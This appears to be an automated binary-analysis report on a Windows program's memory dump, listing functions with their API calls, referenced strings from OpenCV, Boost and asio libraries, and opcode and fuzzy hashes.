__EH_prolog.LIBCMT ref: 00526C93
_strlen.LIBCMT ref: 00526CBC
_strlen.LIBCMT ref: 00526CC9

Strings

cvRegisterModule, xrefs: 00526D65
module != 0 && module->name != 0 && module->version != 0, xrefs: 00526D76

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$H_prolog
String ID: cvRegisterModule$module != 0 && module->name != 0 && module->version != 0
API String ID: 1011152186-743800567
Opcode ID: 98610e52668e412a932fd91fc7827e780124b1c5506717b150534b5dbda01d70
Instruction ID: 1c216b274c29c07072239776dbc70d41aa8b3040de0a75e9c3b73208a9111316
Opcode Fuzzy Hash: 98610e52668e412a932fd91fc7827e780124b1c5506717b150534b5dbda01d70
Instruction Fuzzy Hash: BD31E0B2A002189BEB19DBA4DC51BEEBBB5EF45304F10852AF502D66A2DB749948CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00422B9B, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00582111: __CxxThrowException@8.LIBVCRUNTIME ref: 0058212B

Part of subcall function 00582151: __CxxThrowException@8.LIBVCRUNTIME ref: 0058216B

__EH_prolog.LIBCMT ref: 00422C56

Part of subcall function 004B041D: __EH_prolog.LIBCMT ref: 004B0422

Strings

stoull argument out of range, xrefs: 00422C46
invalid stoull argument, xrefs: 00422C3C
invalid stoll argument, xrefs: 00422BE1
stoll argument out of range, xrefs: 00422BEB

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Exception@8H_prologThrow
String ID: invalid stoll argument$invalid stoull argument$stoll argument out of range$stoull argument out of range
API String ID: 3222999186-1946835417
Opcode ID: ccb6d40b597528f8010f630c3a5fe01da19375f0980106ba19eb153fbf8ae837
Instruction ID: fe06e94a4b8c7fc3fce178cda7316d0877a1ce9cf2d97226f3a7738e49367a7f
Opcode Fuzzy Hash: ccb6d40b597528f8010f630c3a5fe01da19375f0980106ba19eb153fbf8ae837
Instruction Fuzzy Hash: 5721D772B10218BFEB14AA94DD47AAEB7ADEF81321F10016AF90453602DBF56D00C7B5

Uniqueness

Uniqueness Score: -1.00%

Function 004B19DE, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 88COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004B19E3

Part of subcall function 0041EE30: __EH_prolog.LIBCMT ref: 0041EE35

Part of subcall function 0041037A: __EH_prolog.LIBCMT ref: 0041037F

Strings

set_option, xrefs: 004B1A6D
bind, xrefs: 004B1A94
listen, xrefs: 004B1AB2
open, xrefs: 004B1A38

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: bind$listen$open$set_option
API String ID: 3519838083-2803824588
Opcode ID: 53c4425e28e5b31553ecc7ccb15633411e4aab6e60d92fb543613f8761b42e21
Instruction ID: 8f6f3a60f9ef5251c5878fba069f9f8630cfcdb0f39ba3d3c9e46d9f78704a2d
Opcode Fuzzy Hash: 53c4425e28e5b31553ecc7ccb15633411e4aab6e60d92fb543613f8761b42e21
Instruction Fuzzy Hash: 9F317571E0010DAFDB10EF94D882AEEB775EF44314F10842EF914D7181E7B49A86CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00526972, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

__swprintf.LEGACY_STDIO_DEFINITIONS ref: 00526A0F
__CxxThrowException@8.LIBVCRUNTIME ref: 00526A67

Strings

%s, xrefs: 00526A1E
unknown function, xrefs: 005269E1, 00526A00
OpenCV Error: %s (%s) in %s, file %s, line %d, xrefs: 00526A09

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Exception@8Throw__swprintf
String ID: %s$OpenCV Error: %s (%s) in %s, file %s, line %d$unknown function
API String ID: 2877379683-3808662302
Opcode ID: f0bf1f0858aa9d57627bb78dcaa79b95fe79175b50f9a71919c5454ad5ba66d1
Instruction ID: 3b8d40520611cb171773fca5a058683afeea0e28cbdaed5988659c37b117de5a
Opcode Fuzzy Hash: f0bf1f0858aa9d57627bb78dcaa79b95fe79175b50f9a71919c5454ad5ba66d1
Instruction Fuzzy Hash: 3431AF70500611DFEB18DB64E909E667BAAFF86300F50096CE142875E2DBB1F9C0CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414F8F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00414FA1

Strings

)@A, xrefs: 0041415C

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Value
String ID: )@A
API String ID: 3702945584-964663934
Opcode ID: f31d188394a58046fcd61eff6e3b51ac5bb85199b8a6c03775566fc7413cb432
Instruction ID: 3f9ac80ab9e63e5c189cd3529ccbf7650f272e568715f3399f6b8bfdb81578f8
Opcode Fuzzy Hash: f31d188394a58046fcd61eff6e3b51ac5bb85199b8a6c03775566fc7413cb432
Instruction Fuzzy Hash: 8731B4B2D01209DFDB14EFA8C9499DEBFF8FF41310F10826AE815A7291D3349E458B95

Uniqueness

Uniqueness Score: -1.00%

Function 004B4A1D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004B4A22
__Getcvt.LIBCPMT ref: 004B4A40
std::_Locinfo::_Getcvt.LIBCPMT ref: 004B4A70

Strings

true, xrefs: 004B4A99
false, xrefs: 004B4A87

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Getcvt$H_prologLocinfo::_std::_
String ID: false$true
API String ID: 312723928-2658103896
Opcode ID: 06ac028dd23ed2cc637c0f04b08e6e6cdaeaca24eb427d601aaf97b6d71e5260
Instruction ID: 98a047b2ec92a666e2e095e22c023d93f1b6ca525b1dc81a2246c472c5db7a08
Opcode Fuzzy Hash: 06ac028dd23ed2cc637c0f04b08e6e6cdaeaca24eb427d601aaf97b6d71e5260
Instruction Fuzzy Hash: E8218EB1804744AECB21DFA5C4419AEBBF8EF85310F10855FE45597612C7789A05CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004130E6, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00412F5C: __EH_prolog.LIBCMT ref: 00412F61

__CxxThrowException@8.LIBVCRUNTIME ref: 00413103

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

__EH_prolog.LIBCMT ref: 0041310E
new.LIBCMT ref: 0041311F

Part of subcall function 0041308A: __EH_prolog.LIBCMT ref: 0041308F

Part of subcall function 0041046F: __EH_prolog.LIBCMT ref: 00410474

Strings

a0A, xrefs: 0041315C
5A, xrefs: 0041316E

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$ExceptionException@8RaiseThrow
String ID: a0A$5A
API String ID: 1193697898-3613670376
Opcode ID: 0453ab6e11982f829910caa79824c4668a638d97d96eae85b71ff3758c7a650f
Instruction ID: 5228e2c018721e28874958e8575dc73d0ed4b1a8756d38538d9b1c8856c80e62
Opcode Fuzzy Hash: 0453ab6e11982f829910caa79824c4668a638d97d96eae85b71ff3758c7a650f
Instruction Fuzzy Hash: 9421F3B1A00209EFC704DFA8C449A9DBBF9FF48318F10425EE5149B682D7B5E945CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00414B9F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?,?,?,?,?,006BAFEF,000000FF,?,00414B54), ref: 00414C08
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,006BAFEF,000000FF,?,00414B54), ref: 00414C21
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,006BAFEF,000000FF,?,00414B54), ref: 00414C3C

Part of subcall function 00414F2A: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000), ref: 00414F51
Part of subcall function 00414F2A: GetLastError.KERNEL32 ref: 00414F5B

Part of subcall function 004146D0: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 004146EE
Part of subcall function 004146D0: CloseHandle.KERNEL32(?), ref: 004146F7
Part of subcall function 004146D0: TerminateThread.KERNEL32(?,00000000), ref: 00414711

Part of subcall function 0041B25A: CloseHandle.KERNEL32(?,?,00000000,?,00414B30,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0041B26A

Strings

yFA, xrefs: 00414C45
IKA, xrefs: 00414BBF

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CloseHandle$CompletionCriticalDeleteErrorLastMultipleObjectsPostQueuedSectionStatusTerminateThreadWait
String ID: IKA$yFA
API String ID: 1875059124-2675676849
Opcode ID: 385b1d9adf83e12845914198d8f8e7a0cb604735594edb2dc88d8fb92c501079
Instruction ID: 87ecea2992fb7e7ac7017cbf84a817d9d6a6f21c01299ea272fee8c8fe13b94b
Opcode Fuzzy Hash: 385b1d9adf83e12845914198d8f8e7a0cb604735594edb2dc88d8fb92c501079
Instruction Fuzzy Hash: CD21C031400784EBD721EF65CA057DEBBF5EF40714F14455EE08257A91CBB82A88CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00410A77, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 32COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00410A7C

Strings

unspecified system error, xrefs: 00410AB0
stream truncated, xrefs: 00410AB7
asio.ssl.stream error, xrefs: 00410A9D
unexpected result, xrefs: 00410AA9

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: asio.ssl.stream error$stream truncated$unexpected result$unspecified system error
API String ID: 3519838083-2829376187
Opcode ID: dbb5516d7c3d89220cb4e4ca4bcf79310b10f97cd92497cff856f96e53a8ec9a
Instruction ID: 65e10c3dc9cb61e760b7f4d5ad23a2a917327bd022f706b357d93f4a6e5b9524
Opcode Fuzzy Hash: dbb5516d7c3d89220cb4e4ca4bcf79310b10f97cd92497cff856f96e53a8ec9a
Instruction Fuzzy Hash: F0F030B1A84325EB8714DF9CE5459E97BA4BF55780F00420BB84992681C6FE89C0879A

Uniqueness

Uniqueness Score: -1.00%

Function 0069CD82, Relevance: 7.7, APIs: 5, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8a423657d6bb5382cc7bc649591f87164532835b2354604c8317a08be089027
Instruction ID: 24ba474dbbdd3b28a4a5c7296d2cea6c369e8b687720244efb5db8b9d57c0838
Opcode Fuzzy Hash: a8a423657d6bb5382cc7bc649591f87164532835b2354604c8317a08be089027
Instruction Fuzzy Hash: FA71AF319002569BDF218F59C884AFFBB7FEF55370F24422AE811A7A81DB718D46C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 005CD190, Relevance: 7.6, APIs: 5, Instructions: 118COMMON

Download Yara Rule

APIs

Part of subcall function 005CCF80: CloseHandle.KERNEL32(00000000,CAAA386B), ref: 005CCFDA
Part of subcall function 005CCF80: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,?,?,?,005CCF59,CAAA386B), ref: 005CCFF5

ReleaseSemaphore.KERNEL32(?,000000FF,00000000,CAAA386B,?,?,?,?,00000000,006DC152,000000FF,?,005CD34F,CAAA386B,?), ref: 005CD216
ReleaseSemaphore.KERNEL32(?,?,00000000,?,?,00000000,006DC152,000000FF,?,005CD34F,CAAA386B,?), ref: 005CD23E
CloseHandle.KERNEL32(?,CAAA386B,?), ref: 005CD286
CloseHandle.KERNEL32(00000000,?,?,CAAA386B,?), ref: 005CD2D9
SetEvent.KERNEL32(?), ref: 005CD2E0

Part of subcall function 00410CD6: CloseHandle.KERNEL32(00000000), ref: 00410CFA

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
String ID:
API String ID: 4166353394-0
Opcode ID: 60a81e64972fc3c5596f69fe96608fcf8635a61ed737797c15b586011bca7ab0
Instruction ID: ff90909f970adabf3b9b36100020f746d6f59d66c93a268ebd824719c57fa00f
Opcode Fuzzy Hash: 60a81e64972fc3c5596f69fe96608fcf8635a61ed737797c15b586011bca7ab0
Instruction Fuzzy Hash: FD41DA75A002059FEB258F98DC84F2ABBB9FB45321F1446BDEC18DB292D634DC41CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00425472, Relevance: 7.6, APIs: 5, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00425477
EnterCriticalSection.KERNEL32(?), ref: 0042548B
LeaveCriticalSection.KERNEL32(?), ref: 004254A1
EnterCriticalSection.KERNEL32(?), ref: 004254D5
LeaveCriticalSection.KERNEL32(?), ref: 004254FE

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalSection$EnterLeave$H_prolog
String ID:
API String ID: 1633115879-0
Opcode ID: 0fe3a8d94ac154ace3413d1bb34da292f4e706d2249084d226980c37feef89e6
Instruction ID: ac3abf8c6277ae92739443647cd5a365db8cf16a597941e0b50f57c79c2548f0
Opcode Fuzzy Hash: 0fe3a8d94ac154ace3413d1bb34da292f4e706d2249084d226980c37feef89e6
Instruction Fuzzy Hash: 42113431A45689EFDB01EBA4D9447FEBF78EF11312F54010AE440A3281C7780B88C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 006B2E06, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 006B2E1E

Part of subcall function 006A071F: RtlFreeHeap.NTDLL(00000000,00000000,?,006B30B9,?,00000000,?,00000000,?,006B335D,?,00000007,?,?,006B3746,?), ref: 006A0735
Part of subcall function 006A071F: GetLastError.KERNEL32(?,?,006B30B9,?,00000000,?,00000000,?,006B335D,?,00000007,?,?,006B3746,?,?), ref: 006A0747

_free.LIBCMT ref: 006B2E30
_free.LIBCMT ref: 006B2E42
_free.LIBCMT ref: 006B2E54
_free.LIBCMT ref: 006B2E66

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5aa368f264e038e900a824d98831a4a2008d9a9b755e4e2f4df0ff6330c95aee
Instruction ID: a9bd2fc81ccc56ffc52ee5ada315827af27516196d19c29db94d0d854f5d902a
Opcode Fuzzy Hash: 5aa368f264e038e900a824d98831a4a2008d9a9b755e4e2f4df0ff6330c95aee
Instruction Fuzzy Hash: 08F090B2500205AB9660FB69E8E6C8B73EBBA057107645C09F105D7A60CB34FCC18F7C

Uniqueness

Uniqueness Score: -1.00%

Function 00419760, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00419764

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

__EH_prolog.LIBCMT ref: 0041976F

Part of subcall function 0047DA23: __EH_prolog.LIBCMT ref: 0047DA28
Part of subcall function 0047DA23: GetModuleHandleA.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 0047DAD7
Part of subcall function 0047DA23: GetProcAddress.KERNEL32(00000000), ref: 0047DADE

Part of subcall function 00413FDC: std::_Throw_Cpp_error.LIBCPMT ref: 00413FE7

Strings

a, xrefs: 0041986A
@, xrefs: 004197F0

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$AddressCpp_errorExceptionException@8HandleModuleProcRaiseThrowThrow_std::_
String ID: @$a
API String ID: 3644655947-1149691066
Opcode ID: c6995b370d9170d680972490111b4e75d57f2d665437b3fece9a8405d0d553f4
Instruction ID: d66daccddaeb2d3ad5201b83bf8248fc7281e3163b32ea7fe0d6d35e5a3db004
Opcode Fuzzy Hash: c6995b370d9170d680972490111b4e75d57f2d665437b3fece9a8405d0d553f4
Instruction Fuzzy Hash: CC81E671D0424CAEDB00EFE9D881BDDBBB8AF59304F10412EF515A7291EB785E84CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00431029, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0043102D

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

__EH_prolog.LIBCMT ref: 00431038

Part of subcall function 00460CFB: __EH_prolog.LIBCMT ref: 00460D00

Part of subcall function 004AB703: std::_Deallocate.LIBCONCRT ref: 004AB733

Part of subcall function 004B201B: __EH_prolog.LIBCMT ref: 004B2020
Part of subcall function 004B201B: _strlen.LIBCMT ref: 004B203A

Part of subcall function 004B20A2: __EH_prolog.LIBCMT ref: 004B20A7

Strings

dpY, xrefs: 004311DB
FpY, xrefs: 0043124F

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$DeallocateExceptionException@8RaiseThrow_strlenstd::_
String ID: FpY$dpY
API String ID: 4023453450-3650155637
Opcode ID: 16d60f6a55fed5b29f92188b4acf25f91284f994fcb2322295e500ddd5d8d7a2
Instruction ID: fb2447aa34764a571abd3f9cec200c76fe2e6f71027938b77562c14ccfdb4a2d
Opcode Fuzzy Hash: 16d60f6a55fed5b29f92188b4acf25f91284f994fcb2322295e500ddd5d8d7a2
Instruction Fuzzy Hash: EF718FB1D04248EEDF00EFA9C846ADEBFB4AF56304F54409EE40577252DB781E45CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00472DF3, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 169COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00472DF8

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

Strings

;, xrefs: 00472E84
0, xrefs: 00472E2D
p, xrefs: 00472E8B

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: DeallocateH_prologstd::_
String ID: 0$;$p
API String ID: 3881773970-3246451993
Opcode ID: 0bd3f633d6a4f265fd73292158427bf4cfe267f6ae00ae655eccb47fa2183ff4
Instruction ID: ae006c7664ab914648c69fb3280df63de5fa729f7eb102c209364f70d6f62fbc
Opcode Fuzzy Hash: 0bd3f633d6a4f265fd73292158427bf4cfe267f6ae00ae655eccb47fa2183ff4
Instruction Fuzzy Hash: 4861F371D05288DADF00EFA9D9867DDBFB4AF65304F10809EE509A7282DB781B48CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004B5592, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004B5597

Part of subcall function 004BE812: __EH_prolog.LIBCMT ref: 004BE817

Part of subcall function 00426744: __EH_prolog.LIBCMT ref: 00426749

Part of subcall function 004B85B1: __EH_prolog.LIBCMT ref: 004B85B6
Part of subcall function 004B85B1: __CxxThrowException@8.LIBVCRUNTIME ref: 004B8618

Strings

read error, xrefs: 004B55FF
void __cdecl boost::property_tree::xml_parser::read_xml_internal<class boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class st, xrefs: 004B562E
e, xrefs: 004B5635

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$Exception@8Throw
String ID: e$read error$void __cdecl boost::property_tree::xml_parser::read_xml_internal<class boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class st
API String ID: 1007369359-1872691895
Opcode ID: 86956b5210a13187e7ecb1da0528a131ac756f7ce626937e266841199686272c
Instruction ID: 77c353d1613bf1d7c6e9ff332de183f1575bb3ff2b1075d8f7d0b28d3d3f0447
Opcode Fuzzy Hash: 86956b5210a13187e7ecb1da0528a131ac756f7ce626937e266841199686272c
Instruction Fuzzy Hash: 63613170E01258DECB21DFA9C980ADDFBB1BF18304F5081AEE449B7241DB795A84CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00412B0E, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00412B13

Part of subcall function 0040F438: __EH_prolog.LIBCMT ref: 0040F43D

Part of subcall function 00413005: __EH_prolog.LIBCMT ref: 0041300A

Part of subcall function 0041046F: __EH_prolog.LIBCMT ref: 00410474

new.LIBCMT ref: 00412BF7

Part of subcall function 00412ECB: __EH_prolog.LIBCMT ref: 00412ED0

Strings

5A, xrefs: 00412BA0
class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 00412BCD

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)$5A
API String ID: 3519838083-1110745283
Opcode ID: a16f0ac64e45c7f7e87478e8ac285cf3c66ffa3665fcd232f3c9c5585ca02ef5
Instruction ID: 74f255da9f5d830f86434fac7068c22bc75ddf711811b1d044a069a6a3fb180b
Opcode Fuzzy Hash: a16f0ac64e45c7f7e87478e8ac285cf3c66ffa3665fcd232f3c9c5585ca02ef5
Instruction Fuzzy Hash: CE5165B1D05248DFDB00DF98D9846EEBFF5AF15308F14806EE504AB341E7B89A88CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0042F34C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122sleepCOMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0042F350

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 0042F469

Strings

$, xrefs: 0042F45B
D, xrefs: 0042F421

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ExceptionException@8RaiseSleepThrow
String ID: $$D
API String ID: 38309065-1079792385
Opcode ID: e855dab888d90e1ece30763859fb7e85c47ef4f65fe9000f779bdef2e355ae8e
Instruction ID: 398d64158e90a984a05c02784c47c8e746ee523f7a4b4d72c6d0a36603d5c62d
Opcode Fuzzy Hash: e855dab888d90e1ece30763859fb7e85c47ef4f65fe9000f779bdef2e355ae8e
Instruction Fuzzy Hash: EA411DB190120DAFEB109BA0DC89EEFBB7CFB89314F004465F609A2161D7756E48CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 005CEE50, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00000000,00000000,CAAA386B), ref: 005CEE82
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 005CEEBD
GetLastError.KERNEL32 ref: 005CEEC7

Part of subcall function 005D47B0: __CxxThrowException@8.LIBVCRUNTIME ref: 005D4855

Strings

boost::filesystem::current_path, xrefs: 005CEED1

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CurrentDirectory$ErrorException@8LastThrow
String ID: boost::filesystem::current_path
API String ID: 786775625-4026011040
Opcode ID: 34ba431c0e3e1902e248736608bc93c538694c21e1325327c6e4db9101f2c64b
Instruction ID: 2b91fbb656eadc5c54d0b58912f9313d96644c4c26ca662b6e91dc839e2a9301
Opcode Fuzzy Hash: 34ba431c0e3e1902e248736608bc93c538694c21e1325327c6e4db9101f2c64b
Instruction Fuzzy Hash: 3221B471600245AFD7109F69DC06B5ABBEAFF45750F04462EF80ACB790E7B4E900C791

Uniqueness

Uniqueness Score: -1.00%

Function 00424DDE, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00424DE3

Part of subcall function 004249FD: __EH_prolog.LIBCMT ref: 00424A02
Part of subcall function 004249FD: htonl.WS2_32(7F000001), ref: 00424A9C
Part of subcall function 004249FD: htonl.WS2_32(00000000), ref: 00424AF3
Part of subcall function 004249FD: htonl.WS2_32(7F000001), ref: 00424AFF

new.LIBCMT ref: 00424E94
new.LIBCMT ref: 00424EAA

Part of subcall function 00689E2F: Concurrency::cancel_current_task.LIBCPMT ref: 00689E47

Part of subcall function 00414734: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,00414B24,00000000,00000000,?,?,00000000,00000000), ref: 00414749
Part of subcall function 00414734: GetLastError.KERNEL32(?,?,00414B24,00000000,00000000,?,?,00000000,00000000), ref: 0041475B
Part of subcall function 00414734: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00414B24,00000000,00000000,?,?,00000000,00000000), ref: 0041479E
Part of subcall function 00414734: GetLastError.KERNEL32(?,?,00414B24,00000000,00000000,?,?,00000000,00000000), ref: 004147B0
Part of subcall function 00414734: GetLastError.KERNEL32(?,?,?,?,?,?,?,00414B24,00000000), ref: 00414816
Part of subcall function 00414734: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00414B24,00000000), ref: 0041482C
Part of subcall function 00414734: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00414B24,00000000), ref: 0041483A

Strings

yFA, xrefs: 00424DF7

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorLasthtonl$CloseCreateEventH_prologHandle$Concurrency::cancel_current_task
String ID: yFA
API String ID: 2183375162-60363592
Opcode ID: 2299be1529cdf88c418909576b262e71cfe97009283923b2b8674ba0aa90b7fe
Instruction ID: e2410ec6b11046f468dd03ba1824684763ecf8a3f1899d7cf40a9b1897127717
Opcode Fuzzy Hash: 2299be1529cdf88c418909576b262e71cfe97009283923b2b8674ba0aa90b7fe
Instruction Fuzzy Hash: 3231E2B0A01785FEE704DFA9C545B89FFB4BF50304F10826EE1589B282C7B85A54CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004140F9, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004140FE
__ExceptionPtrCopy.LIBCPMT ref: 0041412F

Part of subcall function 00582D26: _Reset.LIBCPMT ref: 00582D3A

__ExceptionPtrCopy.LIBCPMT ref: 00414167

Part of subcall function 00582DB3: shared_ptr.LIBCPMT ref: 00582DBB

Part of subcall function 00582D16: shared_ptr.LIBCPMT ref: 00582D1F

Strings

)@A, xrefs: 0041415C

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CopyExceptionshared_ptr$H_prologReset
String ID: )@A
API String ID: 3356224348-964663934
Opcode ID: 25f800c6cad72c364c18cfbcf649618c335befb1227d7aeb18aff7734a65c357
Instruction ID: f99f7249fa56ae8e0a70bdf426ee4549c90b71bd115ae9360ca48c8d4fa7b845
Opcode Fuzzy Hash: 25f800c6cad72c364c18cfbcf649618c335befb1227d7aeb18aff7734a65c357
Instruction Fuzzy Hash: 572150B2C01209AFDB10EFA8C94A9DEBFF8FF45310F10865AE415A3291E7759B058B54

Uniqueness

Uniqueness Score: -1.00%

Function 005CED90, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

CreateDirectoryExW.KERNEL32(?,?,00000000,?,00435880,005CED1C,?,00000000,00435880,?), ref: 005CEDD3
CreateDirectoryW.KERNEL32(?,00000000,?,00435880,005CED1C,?,00000000,00435880,?), ref: 005CEDEA
GetLastError.KERNEL32(00000000), ref: 005CEDFD

Strings

boost::filesystem::create_directory, xrefs: 005CEE35

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CreateDirectory$ErrorLast
String ID: boost::filesystem::create_directory
API String ID: 2485089472-2941204237
Opcode ID: 87f316f5aeb29a15cda193debe7de4ad6898654a8b1890c078107965bcce6c81
